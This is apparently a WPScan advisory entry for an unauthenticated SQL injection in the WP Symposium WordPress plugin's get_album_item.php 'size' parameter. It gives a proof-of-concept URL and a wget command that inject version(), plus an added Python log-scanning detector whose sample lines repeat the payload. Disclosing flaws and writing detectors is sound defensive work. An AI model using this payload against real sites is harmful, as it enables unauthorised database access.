WP Symposium <= 15.5.1 - Unauthenticated SQL Injection

Description
WordPress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL injection in get_album_item.php, parameter 'size'.

The issue is exploitable even if the plugin is deactivated.

Proof of Concept
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--

PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

The body of the HTTP response contains the MySQL version, for example:
5.5.44-0+deb7u1
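
One way to find requests of this shape in web server access logs, as an added example that is not part of the original advisory. The Combined Log Format, the sample lines, and the rule that a legitimate `size` value is a short plain identifier are assumptions; because the file is reached directly, the check applies whether or not the plugin is active.

```python
import re
from urllib.parse import urlsplit, parse_qs

# File and parameter named in the advisory.
TARGET_SUFFIX = "/wp-content/plugins/wp-symposium/get_album_item.php"
PARAM = "size"

# Assumption: a legitimate value is a short plain identifier.
BENIGN_VALUE = re.compile(r"[A-Za-z0-9_]{1,32}")

# Assumption: Common/Combined Log Format access logs.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def suspicious_size_requests(lines):
    """Return a finding for each request to the plugin file whose 'size'
    value is not a plain identifier."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(TARGET_SUFFIX):
            continue
        # parse_qs percent-decodes values; blank values are kept so "size=" is seen.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if not BENIGN_VALUE.fullmatch(value):
                findings.append({"ip": m.group("ip"), "time": m.group("time"),
                                 "status": int(m.group("status")), "size": value})
    return findings

# Constructed sample lines (not real traffic): the advisory's PoC query,
# a request with a plain value, and an unrelated page.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Aug/2015:10:12:01 +0000] "GET /blog/wp-content/plugins/'
    'wp-symposium/get_album_item.php?size=version%28%29%20;%20-- HTTP/1.1" 200 16 "-" "Wget/1.13.4"',
    '198.51.100.4 - - [09/Aug/2015:10:13:44 +0000] "GET /blog/wp-content/plugins/'
    'wp-symposium/get_album_item.php?size=thumbnail HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Aug/2015:10:13:45 +0000] "GET /blog/index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in suspicious_size_requests(SAMPLE_LOG):
        print(finding)
```

On sites still running a version before 15.8, any finding with a 200 status is worth reviewing alongside the response size.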

Affects

Plugin wp-symposium
fixed in version 15.8

References

CVE 2015-6522
EXPLOITDB 37824
URL https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter PizzaHatHacker
Views 355
Verified Yes
WPVDB ID 8140

Timeline

Publicly Published 2015-08-09
Added 2015-08-09
Last Updated 2015-08-22

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.